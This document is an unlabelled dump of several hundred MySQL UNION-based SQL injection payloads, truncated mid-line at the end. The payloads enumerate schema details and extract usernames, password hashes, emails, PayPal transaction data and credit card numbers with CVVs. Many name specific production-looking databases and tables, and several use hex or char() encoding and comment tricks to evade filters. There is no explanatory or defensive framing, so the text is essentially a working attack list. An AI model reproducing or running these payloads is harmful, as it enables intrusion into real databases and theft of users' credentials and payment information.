1,2,version(),4,5,6,7,8,9,10/* -1 union select 1,2,version(),4,5,6,7,8,9,10,11-- 1' union select 1,2,version(),4,5,6,7,8,9,10,11,12/* -1 Union select 1,2,Version(),4,5,6,7,8,9,10,11,12,13,14,15-- -1' union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/* -1 UNION SELECT 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 -- -1 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from articles/* -1 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,user(),15,16,17,18,19,20,21,22-- -1 union select 1,2,version(),4,5,6,7,8,9,10,11,Table_Name,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from information_schema.tables/* -1 union select 1,2,version(),4,5,6,7,8,9,10,11 users-- 1 union select 1,2,version(),4,5,6,7,8 from technical.umo_person-- 1 UNION SELECT 1,2,version(),4,5,6,7,8 LIMIT 1,1 -1 union select 1,2,version(),4,5,6,database(),user(),9,10,11,12,13/* -1 union select 1,2,version(),4,5,database(),7,8,9,10,11,12,user(),14,15,16,17,18,19,20,21/* -1 UNION SELECT 1,2,version(),4,5 FROM information_schema.tables -1 union select 1,2,version(),4,table_name,6,7,8 from information_schema.tables limit 24,1 -1 UNION SELECT 1,2,version(),concat(id,0x3a,username,0x3a,password),5,6,7,8 from users limit 0,1/* -1 union select 1,2,version(),user()/* 1 union select 1,2,version(),user(),5,6,7,8,database(),10-- -1 union select 1,2,version(),user(),5,6,7,database(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 -1 union select 1,2,version(),user(),5,6,database(),8/* -1 union select 1,2,version(),user(),5,database(),7,8,9 -1 union select 1,2,version(),user(),database(),6,7,8,9,10,11,12/* -1 union select 1,2,'xekme',4,5,6 from mysql.user-- -1 union select 1,,3,4,null,6,7,8,9,10,11 from urls -1 union select 1,4,3,4,5,concat(version(),0x3a,user(),0x3a,database()),7,8,9,10,11,12,13,14,15,16 -1 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(user_id,0x7873716C696E6A64656C,email,0x7873716C696E6A64656C,pass,0x7873716C696E6A64656C,first_name) FROM sbl.users LIMIT 11,1),0x7873716C696E6A656E64),0x71),0x71)/* 1 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),3 -1 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),3,4,5,6,7,8,9-- -1 union select 1,AES_DECRYPT(AES_ENCRYPT(concat(converge_pass_hash,char(58),converge_pass_salt),0x78),0x78) from ibf_members_converge limit 0,1/* -1' union select 1,AES_DECRYPT(AES_ENCRYPT(concat(email_user,0x3a,password),0x75),0x75) from us -1 union select 1,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x00),0x00),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from mysql.user limit 3,1/* -1 union select 1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,user(),database(),version()),0x7a),0x7a),3,4,5,6,7,8,9,10,11,12 from mysql.user/* -1 union select 1,aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),version(),database()),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/* -1 union select 1,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),3,4/* 1 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),3,4,5 -1 union select 1,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),3,4,5,6-- 1 union select 1,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),3,4,5,6,7-- -1 union select 1,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),3,4,5,6,7,8,9,10/* 1' union select 1,aes_decrypt(aes_encrypt(concat_ws(0x3a,Version(),Database(),User()),0x71),0x71),3,4,5 limit 1,1/* 1 UNION SELECT 1,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),3,4 LIMIT 1,1/* -1 union select 1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3b,user(),database(),version()),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14/* 1 union select 1,AES_DECRYPT(AES_ENCRYPT(convert(concat_ws(0x3a,version(),database(),user()) using cp1251),0x71),0x71),3,4,5,6,7,8,9/* -1 union select 1,AES_DECRYPT(AES_ENCRYPT(table_name,0x71),0x71),3,4,5,6,7,8,9,0,1,2,3,4 from information_schema.tables limit 18,1/* 1 union select 1,AES_DECRYPT( AES_ENCRYPT(user(),0x71),0x71),3,4,5,6,7,8,9/* -1 union select 1,AES_DECRYPT(AES_ENCRYPT(user(),0x71),0x71),3,4,5,6,7,8,9,10/* -1 union select 1,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),3,4,5,6,7,8,9,AES_DECRYPT(AES_ENCRYPT(VERSION(),0x71),0x71),AES_DECRYPT(AES_ENCRYPT(DATABASE(),0x71),0x71),12,13/* -1 union select 1,AES_DECRYPT(AES_ENCRYPT(user(),0x71),0x71),3,4,5,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),AES_DECRYPT(AES_ENCRYPT(database(),0x71),0x71)/* -1 union select 1,aes_decrypt(aes_encrypt(user,0x71),0x71),3,aes_decrypt(aes_encrypt(password,0x71),0x71),5,6,7 from mysql.user/* -1 union select 1,aes_decrypt(aes_encrypt(usr,0x71),0x71),3,4 from ssp_usrs limit 1,1-- -1 union select 1,AES_DECRYPT(AES_ENCRYPT(version(),0x17),0x17),3,4 from users/* -1 union select 1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15/* -1 union select 1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from users -- -1 union select 1,banner,1 from v$version-- 1 union select 1,char(72,97,99,107,101,100,32,98,121,32,91,32,99,97,115,104,32,93),3,4,5,6,7/* -1 union select 1,column_name,3,4,5,6 from information_schema.columns where table_name=0x457368705f6d656d62657273-- -1 union select 1,column_name,3,4,5,6 from information_schema.columns where table_name=char(102,111,114,117,109,95,97,99,99,101,115,115) limit 0,1-- -1 union select 1,column_name,3,4 from information_schema.columns limit 80,1# 1 union select 1,concat(0x2a,version(),user(),database()),3,4,5 limit 1,1/* 1 union select 1,concat(0x2,version(),user(),database()),3,4,5,6,7/* 1 union select 1,concat(0x2,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15 1' union select 1,concat(0x3a3a,unhex(hex(username)),0x3a3a,unhex(hex(password))),3,4,5,6 from _verwaltung.tbl_user limit 1,3/* -1 union select 1,concat(0x3a,user,pass),3,4,5,6 from admin-- -1 union select 1,concat(0x3a,user(),version(),database()),3,4,5,6,7,8,9-- -1 union select 1,concat(0x3a,version(),0x3a,database()) -1 UNION SELECT 1,CONCAT(0x3a,Version(),0x3a,Database(),0x3a,User())/* 1 union select 1,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),3,4,5-- 1 union select 1,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),3,4,5,6,7,8,9-- 1 union select 1,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),3,4,5,6,7,8,9,10-- 1 union select 1,concat(0x3,password,database(),version(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from mysql.user -1 UNION SELECT 1,CONCAT(0x6472385F3838777777333371,concat(column_name),0x686874666638385F363632),3,4,5,6,7 FROM information_schema.columns where table_name='clients' limit 1,1/* -1 UNION SELECT 1,CONCAT(admin_name,pwd),3,4 FROM auction.sbauctions_admin-- -1 union select 1,concat(a_name,0x3a,a_psword,0x3a,a_level,0x3a,fixuser,0x3a,fixtime) from cn_admin limit 0,1/* -1' union select 1,concat(char(58,58,58),table_schema,char(46),table_name,char(58,58,58)),3,4,5,6,7,8,9,10,11 from information_schema.tables/* -1 union select 1,concat(client,char(58),phone),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from request limit 0,1/* -1 union select 1,concat(cmslogin,0x3a,cmspwd),3,4 FROM tbl_cms-- -1 UNION SELECT 1,concat(DATABASE(),0x3a,USER(),0x3a,VERSION()),3,4-- -1 union select 1,concat(database(),0x3a,user(),0x3a,version()),3,4,5,6,7,8,9,10 -- -1 union select 1,concat(database(),0x3a,user(),0x3a,version()),3,4,5,6,7,8,9,10,11 -- -1 union select 1,concat(database(),0x3a,user(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/* -1 union select 1,concat(database(),char(58),user())/* -1 union select 1,concat(database(),char(58),user(),char(58),version())/* -1 union select 1,concat(database(),char(58),user(),char(58),version()),3/* -1 union select 1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7,8,9,10,11,12,13/* -1 union select 1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* -1 union select 1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* -1 union select 1,concat(database(),version(),user())-- -1 union select 1,concat(email,0x3a,pass),3,4 from clients/* -1 union select 1,concat(email,0x3a,pass),3,4 from cpAccounts where level=3/* -1 union select 1,concat(email,0x3a,pass),3 from kpro_user/* -1 union select 1,concat(email,0x3a,passwd),3,4,5,6,7 from users limit 0,1/* -1 union select 1,concat(email,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from user limit 0,1/* 1 union select 1,ConCat(email,Char(58),password),3,4,5,6,7,8 FROM prgp_user LIMIT 0,1 -- -1 union select 1,concat(FName,0x3e,password),3 from admin-- 1 union select 1,concat(id,0x3a,password,0x3a,email),3 from users/* -1 union select 1,concat(id,0x3a,User,0x3a,Password),3,4,5,6,7,8,9,10,11,12,13,14,15 from AdminUsers-- -1 union select 1,concat(id,char(58),name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from autors limit 21,1/* -1 union select 1,concat(id,char(58),namek,char(58),t),3 from tom_tabless limit 0,1/* -1 union select 1,concat(login,0x26,password),3 from members/* -1 union select 1,concat(login,0x3a,pass,0x3a,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 from users limit 1,1/* -1 union select 1,concat(login,0x3a,pass),concat(user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15 from kv_adminusers -1 union select 1,concat(LOGIN,0x3a,PASS) from kapital_zed_users limit 0,1-- -1 union select 1,concat(login,0x3a,password),3,4,5,6 from users-- 1 union select 1,concat(login,0x3a,password),3,4,5,6 from yasonua_top.users-- -1 uniOn Select 1,concat(login,0x3a,password) from ssrusers-- -1 union select 1,concat(login,char(58),user_password),3,4,5,6 from users -- -1 union select 1,concat(name,0x3a3a,member_login_key),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from ibf_members limit 0,10/* -1 union select 1,concat(name,0x7c,pass,0x7c,id,0x3c62723e),3,4 from specavia.users -- -1 union select 1,concat(name,char(13),pass),3,4,5,6,7,8,9 from users limit 1,1-- -1 union select 1,concat(name,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from user/* -1 union select 1,concat(name,char(58),email,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from autors/* -1 union select 1,concat(name,char(58),pass),3,4,5,6,7,8,9,10,11,12,13 from user/* -1 union select 1,concat(name,char(58),password),3,4,5 from users/* -1 union select 1,concat(name,char(58),pwd) from user/* 1 UNION SELECT 1,concat(newsid,0x3a3a3a,newstext),3,4 from im_news/* -1 union select 1,concat(nickname,0x3a,pass),3,4,5,6,7 from tbl_user -- 1' union select 1,concat(oprname,0x3a3a,pwd,0x3a3a,prvLevel),3,4,5 from church.church_users limit 0,10/* -1 union select 1,concat(table_name,0x20,column_name,0x20,table_schema) from information_schema.columns limit 177,200 -1 UNION SELECT 1,concat(table_name,0x3a,column_name) FROM information_schema.columns/* -1 union select 1,concat(table_name),3 from information_schema.tables/* -1 union select 1,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8,9 from information_schema.columns where column_name LIKE /**/0x257061737325/**/-- -1 UNION SELECT 1,concat(user(),0x3a,database(),0x2a,version()),3,4/* -1 union select 1,concat(user(),0x3a,database(),0x3a,version()),3,4,5-- 1 union select 1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7-- -1)) union select 1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11 -- -1 union select 1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/* -1 union select 1,concat(user,0x3a,pass),3,4,5 from userlist-- -1 union select 1,concat(user,0x3a,pass),5,6,5 from login/* -1 union select 1,concat(user,0x3a,password,0x3a,file_priv),3,4,5,6,7,8,9,10 from mysql.user-- 1 union select 1,concat(user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,24,25,26,27,28,29 from mysql.user LIMIT 1,6/* 1 union select 1,Concat(user,0x3a,password),3,4,5,6,7,8,9,10 from mysql.user-- -1 union select 1,concat(user,0x3a,password),3,4,5,6,7,8 from mysql.user limit 1,1-- -1 union select 1,concat(user,0x3a,password),3,4 from mysql.user/* 1 union select 1,concat(user,0x3a,password),3 from mysql.user-- -1 union select 1,concat(user(),0x3a,version(),0x3a,database()),3/* -1 union select 1,concat(user(),0x3a,version(),0x3a,database()),3,4,5/* -1 union select 1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7 -- -1 union select 1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8-- -1 union select 1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8/* -1 union select 1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4,5,6,7,8,9,10,11,12/* -1 union select 1,concat(user(),0x3a,version()),3,4,5,6 from user/* -1 union select 1,concat(USER(),0x3a,VERSION()),3,4,5 from mysql.user limit 0,1/* -1 union select 1,concat(user(),0x3b,database()),3,convert(version(),char),5,6,7,8,9/* -1 union select 1,concat(user(),0x81,version(),0x81,database()),3,4,5,6,7,8-- -1 UNION SELECT 1,concat(user(),char(32,32),0x6861636b206279205b2063617368205d)/* 1' union select 1,concat(user(),char( 58),database(),char(58),version()),3,4,5,6,7,8,9,1 0,11,12/* 1' union select 1,concat(user(),char(58),database(),char(58),version()),3,4,5,6,7,8,9,10,11,12/* -1 union select 1,concat(user(),char(58),database()),version(),44,55,66,77/* 1 union select 1,concat(user,char(58),password),3,4,5,6,7,8,concat_ws(char(58),user(),version(),database()) from mysql.user/* -1 union select 1,concat(user,char(58),password),3,4,5,6 from mysql.user limit 0,1/* 1 union select 1,concat(user,char(58),password) from mysql.user/* -1 UNION SELECT 1,concat(user(),CHAR(58),VERSION()),3,4,5,6/* -1 union select 1,concat(user(),char(58),version(),char(58),database()),3,4,5,6,7,8,9,10,11,12,13 /* -1 union select 1,concat(user(),char(58),version(),char(58),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* -1 union select 1,concat(user(),database(),version()),3,4,5,6,7,8 from information_schema.tables-- -1 union select 1,concat(user_id,0x3a,user_password),3,4,5 from phpbb_users/* -1 union select 1,concat(username,0x2f2f2f2f,password),3,4 from administration-- -1' union select 1,concat(username,0x2F,password),3,4,5,6,7,8,9,10,11,12,13 from dokeos_main.user limit 0,1/* -1 union select 1,concat(username,0x3a,passwd,0x3a,email),3,4,5,6,7,8,9,10,11,12,13,14,15 from user limit 101,1/* -1 union select 1,concat(username,0x3a,passwd),3,4 from user/* -1 union select 1,concat(username,0x3a,password,0x3a,email),3,4,city from users limit 31000,31001/* -1/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from jos_users limit 1,1-- -1 union select 1,concat(username,0x3a,password),3,4,5,6,7 from admin limit 1,1/* -1 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7 FROM users-- -1 union select 1,concat(username,0x3a,password),3,4,5,6,Database(),8,9,0,1,12,3,4,5,6,7,8,9,0,1,22,3,4,5,6,7,8,9,0,1,32,3,4,5,6,7,8,9,0,41 from user limit 0,1-- -1' union select 1,concat(username,0x3a,password),icq,4,5,6,7,convert(concat(user(),0x3,version(),0x3,database()) using latin1),9,10,11,12 from user limit 1,2/* -1 union select 1,concat(user_name,0x3a,user_email,0x3a,user_password),3,4,5,6,7 from 4images_users-- -1' union select 1,concat(username,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from rnr_forum_users limit 1,1/* -1 union select 1,concat(user_name,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15 from e107_user-- -1'union select 1,concat(user_name,0x3a,user_password),3,4,5 from administrators-- 1 union select 1,concat(username,0x3a,user_password),3,4 from users/* -1 union select 1,concat(username,0x3,password),3,4,5,6,7,8 from users limit 0,1-- -1 union select 1,concat(username,char(58),password),3,4,5,6,7 from users/* -1 union select 1,ConCat(username,Char(58),password) FROM users LIMIT 0,1 -- -1 union select 1,concat(username,char(58),user_password),3 from phpbb_users limi -1 union select 1,concat(username,char(58),userpwd),3,4 from users/* -1 union select 1,concat(username,char(58),version(),database()),3,4,5,6,7,8 from user/* -1 union select 1,concat(user,password,host),3,4,5,6,7,8,9,10,11,12,13,concat(USER(),VERSION(),DATABASE()),15,16 FROM mysql.user/* -1 union select 1,concat(version(),0x20,database(),0x20,user()),3,4-- -1 union select 1,concat(version(),0x2F,database(),0x2F,user()),3,4/* -1 union select 1,concat(version(),0x2F,database(),0x2F,user()),3,4,1,1,1,1,1,1,1,1,1,1,1,1/* -1 union select 1,concat(version(),0x2F,database(),0x2F,user()),3,4,5,6,7,8,9,10/* -1' union select 1,concat(version(),0x2F,user()),3,4,5/* -1 union select 1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7 -- -1 union select 1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7/* -1 union select 1,concat(version(),0x3a,user(),0x3a,database())/* 1 union select 1,concat(version(),0x3a,user(),0x3a,database()) -1 union select 1,concat(version(),0x3a,user(),0x3a,database()),3/* -1 union select 1,concat(version(),0x3a,user(),0x3a,database()),3,4-- -1 union select 1,concat(version(),0x3a,user(),0x3a ,database()),3,4,5,6/* -1 union select 1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6/* 1' union select 1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9/* -1' union select 1,concat(version(),0x3,user(),0x3,database()),3,4,5,6,7,8/* 1 union select 1,concat(version(),char(58,58),database(),char(58,58),user())/* 1 union select 1,concat(version(),char(58,58),database(),char(58,58),user()),3/* -1 union select 1,concat(version(),char(58,58),database(),char(58,58),user()),3,4,5,6,7,8,9,10,11,12,13/* -1 union select 1,concat(version(),char(58),database(),char(58),user()),3,4,5,6,7,8,9,10-- -1 union select 1,concat(version(),char(58),user(),char(58),database())-- -1 union select 1,concat(version(),char(58),user(),char(58),database()),3,4/* -1 UNION SELECT 1,concat(VERSION(),char(58),USER(),char(58),DATABASE()),3,4,5,6,7,8,9,10,11/* -1 union select 1,concat(version(),char(58),user(),char(58),database()),3,777,5/* -1' union select 1,concat(version(),':',database(),':',user()),3,4,5-- -1 union select 1,concat(version(),database(),user()),3,4,5,6,7/* -1' union select 1,concat(version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15 order by '1'='1 -1 union select 1,concat(version(),database(),user(),@@version_compile_os),3,4-- -1) union select 1,concat_ws(0x05,version(),database(),user()),3/* -1 union select 1,concat_ws(0x05,version(),database(),user()),3,4/* -1' UNION SELECT 1,concat_ws(0x0b,@@version_compile_os,version()),3,4,5,6-- -1 union select 1,concat_ws(0x0b,version(),user(),database()),3,4,5,6 1 UNION SELECT 1,concat_ws(0x202f20,user(),version(),database()),3,4,5,6,7 FROM INFORMATION_SCHEMA.TABLES -- -1 union select 1,concat_ws(0x203a20,user(),version(),database()),3,4,5,6,7,8,9-- -1 union select 1,concat_ws(0x203a20,version(),database(),user(),@@version_compile_os),3-- -1 union select 1,concat_ws(0x20,id,user_name,password,email),3,4,5,6,7,8,9,10,11 from members-- -1' union select 1,concat_ws(0x20,version(),database(),user())-- 1 union select 1,concat_ws(0x2a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 -1 union select 1,concat_ws(0x2F,version(),database(),user()),3/* -1) union select 1,concat_ws(0x2F,version(),database(),user()),3/* -1 union select 1,concat_ws(0x2F,version(),database(),user()),3,4/* -1' union select 1,concat_ws(0x2F,version(),database(),user()),3,4,5/* -1 union select 1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7/* -1 union select 1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8/* -1' union select 1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8/* -1 union select 1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9/* -1' union select 1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9/* -1 union select 1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10/* -1 union select 1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/* -1 UNION SELECT 1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/* -1' union select 1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10,11,12/* -1 union select 1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13/* -1 union select 1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/* -1 union select 1,concat_ws(0x2f,version(),user(),database())/* -1 union select 1, concat_ws(0x2f,version(),user(),database()),3,4,5/* -1 union select 1,concat_ws(0x2f,version(),user(),database()),3,4,5,6/* -1 union select 1,concat_ws(0x2f,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* 1 union select 1,concat_ws(0x2,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13/* 1 union select 1,concat_ws(0x2,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13 limit 1,1 1 union select 1,concat_ws(0x2,version(),user(),database()),3,4,5 limit 1,1 -1 union select 1,concat_ws(0x3a,0x3a,user(),0x3a,database(),0x3a,version(),0x3a,0x3a)/* 1 union select 1,concat_ws(0x3a3a3a,id,username,password),3,4 from users -- -1 union select 1,concat_ws(0x3a3a3a,userid,password,email,superuser),3,4,5,6,7,8,9,10 from readplus_login-- -1 union select 1,concat_ws(0x3a3a3a,version(),database(),user()),3-- -1 union select 1,concat_ws(0x3a3a3a,version(),database(),user()),3,4-- -1 union select 1,concat_ws(0x3a3a3a,version(),database(),user()),3,4,5,6,7,8,9,10-- -1 union select 1,concat_ws(0x3a3a,aid,pwd),3,4,5,6,7,8,9 from mpn_authors -- -1 union select 1,concat_ws(0x3a3a,id,l_user,l_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from l_admin -- -1 union select 1,concat_ws(0x3a3a,id,userid,orderdate,shippingcharge,shippingmethoad,promocodeid,total,grandtotal,ccname,cctype,ccnumber,ccmonth,ccyear,cvv,orderstatus,ispaid,fname,mname,lname,address1,address2,city,state,country,zipcode,day_telephone,evening_telephone,companyname,ship_fname,ship_mname,ship_lname,ship_address1,ship_address2,ship_city,ship_state),3 from ordermaster-- -1 union select 1,concat_ws(0x3a3a,name,pass,user),3,4,5,6,7 from users limit 0,1 -1 union select 1,concat_ws(0x3a3a,pn_uname,pn_pass,pn_user_icq),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from nuke_users limit 0,1/* -1 union select 1,concat_Ws(0x3a3a,user_id,contact_name,username,password,email_address),3 from ox_users /* -1 union select 1,concat_ws(0x3a3a,userID,username,password,AdministratorRights),3,4 from users where AdministratorRights=1 -- -1 UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10 from users-- -1 union select 1,concat_ws(0x3a3a,username,passwort,skype,email,wuser_status),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from creative/* -1 union select 1,concat_ws(0x3a3a,user_name,user_password),3,4,5,6,7,8 from users limit 0,10/* -1 union select 1,concat_ws(0x3a3a,user(),version(),database()),3,4-- -1 union select 1,concat_ws(0x3a3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/* 1' union select 1,concat_ws(0x3a3a,usr_login,usr_senha),3,4 from agnc_usuario limit 1,1/* -1 union Select 1,concat_ws(0x3a3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 -- 1 union select 1,concat_ws(0x3a3a,version(),user(),database()),3,4 -- 1' UNION SELECT 1,concat_ws(0x3a3a,version(),user( ),database()),3,4,5,6/* -1 union select 1,concat_ws(0x3a3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13 -- -1 union select 1,concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),3,4-- -1 union select 1,concat_ws(0x3a,database(),0x3a,user(),0x3a,version()),3/* -1 union select 1,concat_ws(0x3a,database(),user(),version()),3-- 1 union select 1,concat_ws(0x3a,database(),user(),version()),3,4,5-- -1 union select 1,concat_ws(0x3a,database(),user(),version()),3,4,5,6-- -1' union select 1,concat_Ws(0x3a,database(),user(),version()),3,4,5,6,7,8,9/* 1' union select 1,concat_ws(0x3a,database(),user(),version()),3,4,5,6,7,8,9,10 /* -1 union select 1,concat_ws(0x3a,database(),user(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51-- -1 union select 1,concat_ws(0x3a,database(),version(),user()),3-- -1 union select 1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7,8,9 -- -1 union select 1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7,8,9,10,11,12,13-- -1' union select 1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* -1 UNION SELECT 1,concat_ws(0x3a,email,pwd),3,4,5,6 ,7,8,9,10,11,12,13,14,15 from signup-- -1 union select 1,concat_ws(0x3a,first_name,password,email,privilege),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from tbl_reg limit 2,1-- -1 union select 1,concat_ws(0x3a,g_userName,g_hashedPassword,g_email),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17 from usr_web4_2.g1_User limit 1,1/* -1 union select 1,concat_ws(0x3a,_id,login,pass,email),3,4,5,6,7,8,9,10,11,12 from damagame_damagame.players where login=0x61646d696e-- -1 UNION SELECT 1,concat_ws(0x3A,id,mc_gross,payment_gross,shipping,tax,mc_fee,payment_fee,mc_currency,txn_type,payment_date,payment_status,verify_sign,txn_id,payment_type,receiver_id,item_name,item_number,receipt_id,custID,rawData),3 FROM bluebitbiz_bluebit_com_au.ecom_paypal/* -1 union select 1,concat_ws(0x3a,id,username,name,password),3,4,5,6,7 from ng.admins -1' union select 1,concat_ws(0x3a,ID,Username,Password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from adminuser -- -1 union select 1,concat_ws(0x3a,lgn,pass) from clt_users limit 1,1/* -1 union select 1,concat_ws(0x3a,login,PASSWORD),3, 4,5,6 from ssp_AdminSet-- -1 union select 1,concat_ws(0x3a,login,PASSWORD),3,4,5,6 from ssp_AdminSet-- -1 union select 1,concat_ws(0x3a,login,password),3,4,5 from system_user/* -1 union select 1,concat_ws(0x3a,login,password),3,concat_ws(char(58),version(),database(),user()),5,6,7,8,9 from bigone_users-- -1 union select 1,concat_ws(0x3a,login,password),3 FROM SW_SITE.security LIMIT 5,1/* -1 union select 1,concat_ws(0x3a,login,password,email),3,4,5 from users/* -1 union select 1,concat_ws(0x3a,login,password,email),3,4,5 from users limit 0,1/* -1 union select 1,concat_ws(0x3a,login,psw) from megaload_auth limit 0,1/* -1 union select 1,concat_ws(0x3a,name,pass,mail,icq),3,mail,icq,pass,6,7,8,9 from users/* -1 union select 1,concat_ws(0x3a,name,pass,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13 from user-- -1 union select 1,concat_WS(0x3a,name,password),3 from auth-- -1' union select 1,concat_ws(0x3a,parol_login,parol_psw),3 from parol_table -- -1 union select 